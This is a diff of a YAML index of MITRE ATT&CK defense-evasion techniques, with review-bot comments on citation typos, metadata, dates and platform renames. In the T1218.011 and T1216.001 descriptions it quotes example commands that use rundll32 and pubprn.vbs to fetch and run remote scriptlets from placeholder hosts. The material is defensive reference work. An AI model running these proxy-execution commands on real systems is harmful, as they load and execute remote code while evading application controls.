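Review bot: the new citation keys `Akami Frog4Shell 2024` (Akamai misspelled) and `Sysdig Fileless Malware 23022` (year typo) look like errors but match the `source_name` entries added later in this diff, so they resolve; they are upstream ATT&CK keys and must not be corrected by hand in this index, or the citation lookups break on the next regeneration. The added Linux text (`/dev/shm`, `/run/shm`, `/var/run`, `/var/lock`) also widens what this object covers, which is consistent with the platform and version changes in the following hunks.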
@@ -200,6 +204,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
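Review bot: the Aquasec `description` in this hunk carries a leading space inside the quotes (`description: " Nitzan Yaakov. (2024, June 4). ...`), which YAML preserves in a double-quoted scalar, so the rendered citation will begin with a space while every other description in the block does not. Trim it here, or have the index generator strip string values, so citations render uniformly.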
@@ -228,15 +243,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
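Review bot: two citation keys in this hunk look like typos inherited from upstream: `Sysdig Fileless Malware 23022` (the description dates the post May 3, 2022, so `2022` was presumably intended) and `Akami Frog4Shell 2024` (akamai.com). Both match the `(Citation: ...)` markers in the description above, so they resolve; do not correct either side in isolation, since the marker text and the `source_name` must stay identical, and report them upstream instead. This hunk is also the first place `spec_version: '2.1'` is dropped (`- spec_version: '2.1'`) while `x_mitre_attack_spec_version` is bumped to 3.2.0; the same removal recurs through the rest of the file, so confirm that nothing downstream validates these technique objects as STIX 2.1 objects, for which `spec_version` is a required common property.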
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
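Review bot: the sentence added in this hunk, `For example, [ClickOnce](...) can be proxied through Rundll32.exe.`, sits immediately after `Double-clicking a .cpl file also causes rundll32.exe to execute.`, so `For example` reads as an example of .cpl double-click behaviour, which it is not; it is a further instance of rundll32 proxying other signed content and belongs at the start of the paragraph or introduced with `Similarly`. The remaining changed lines only re-wrap the `javascript:` moniker example without altering it. The text is upstream ATT&CK wording, so the fix belongs there.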
@@ -286,7 +308,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
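Review bot: the URL for `This is Security Command Line Confusion` is updated (`+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/`) but the `Retrieved March 5, 2018` line directly above it is left unchanged, so the reference now claims a retrieval date that predates the URL it points at. The `Tweet Registry Perms Weakness` and `Twitter ItsReallyNick Masquerading Update` changes later in this file bump the date together with the URL (`Retrieved September 12, 2024`); do the same here and for the Mandiant M-Trends 2020 entry below, which gets the new mandiant.com URL while keeping `Retrieved April 24, 2020`.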
@@ -327,9 +349,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests: []
T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
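Review bot: nearly all of this hunk is key reordering rather than content. `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the entire `external_references` list are deleted here and re-added lower down in the next hunk, with the only substantive differences being `modified` and the reference order (`PAM Creds` now precedes `Red Hat PAM`). That hides the real change to T1556.003 inside roughly fifty moved lines. If this index is regenerated from upstream STIX, have the generator emit keys in a fixed order so later regenerations diff cleanly.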
@@ -476,20 +458,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1578.004:
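Review bot: this hunk drops `x_mitre_permissions_required: - root` from T1556.003 without replacement, while T1578.004 (`x_mitre_permissions_required: - User`) and T1548.003 (`x_mitre_permissions_required: - User`, `x_mitre_effective_permissions: - root`) further down keep theirs. That may reflect upstream retiring the field as objects move to attack spec 3.2.0, but it removes the only machine-readable signal in this entry that modifying PAM modules needs root; anything that filters or scores techniques on that key will now skip PAM. Confirm it is intentional and consistent with the upstream export rather than an artefact of mixing releases. The `revoked: false` and `x_mitre_deprecated: false` additions are fine. The `description` context lines still show the pre-existing code-tag stripping artefact (`pam_unix.so` followed by a line beginning `, which retrieves`), which this change does not touch.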
@@ -518,7 +537,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
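Review bot: `modified` for T1578.004 moves backwards here, from `2022-04-25T14:00:00.188Z` to `2021-03-08T10:33:02.128Z`, and the same backward move occurs below for T1216.001, T1014, T1036.007, T1548.002, T1548.003, T1218.013 and T1600. A regenerated index should not make objects older. The outgoing values all end in the same `.188Z` fraction (most are exactly `T14:00:00.188Z`), which suggests the old file carried bulk-stamped dates and the new one carries the upstream per-object timestamps; that is a legitimate correction, but the commit message should say so, because any consumer that uses `modified` to detect updated techniques will treat these as unchanged or rolled back.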
@@ -545,8 +564,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
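Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1578.004 outright instead of bumping it to 3.2.0 as the other objects in this diff do, leaving the technique with no spec version at all; the same pattern applies to T1036.007, T1548.003 and T1600 below, and these are also the objects whose `modified` dates move backwards. That points to these four being populated from a different upstream export than the rest of the file. Either regenerate everything from one ATT&CK release or restore `x_mitre_attack_spec_version` so every object carries one.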
T1564.012:
technique:
@@ -588,7 +605,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
@@ -666,7 +682,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests: []
T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests: []
T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -870,12 +883,87 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests: []
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
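Review bot: the new T1666 object lands with `x_mitre_detection: ''` and `atomic_tests: []`, although its description names two concrete, auditable API calls (`LeaveOrganization`, `CreateAccount`) and one Azure action (transferring a subscription to another tenant). Those are exactly the events a detection would key on, so this entry is a good candidate for a first atomic test, for example a member-account call to `LeaveOrganization` that is expected to be denied by policy, and `x_mitre_data_sources` should be checked against upstream to confirm `Cloud Service: Cloud Service Modification` is the only source intended. One wording point for upstream: `Adversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy` uses `resource groups`, which in Azure is a specific construct below the subscription, where the surrounding paragraph is talking about accounts and subscriptions.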
@@ -901,11 +989,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
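Review bot: `Office 365` and `Google Workspace` are collapsed into the single platform `Office Suite` here, and the same consolidation appears below for T1564 (`Office 365` to `Office Suite`) and T1484.002 (`Azure AD` and `SaaS` to `Identity Provider`). That follows the upstream platform rename, but if any per-platform index in this repository is produced by matching `x_mitre_platforms` against the old names, those indexes will silently lose these techniques until their mapping is updated; regenerate them from the new names in the same change and check the technique counts before and after.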
@@ -950,12 +1037,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests: []
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests: []
T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
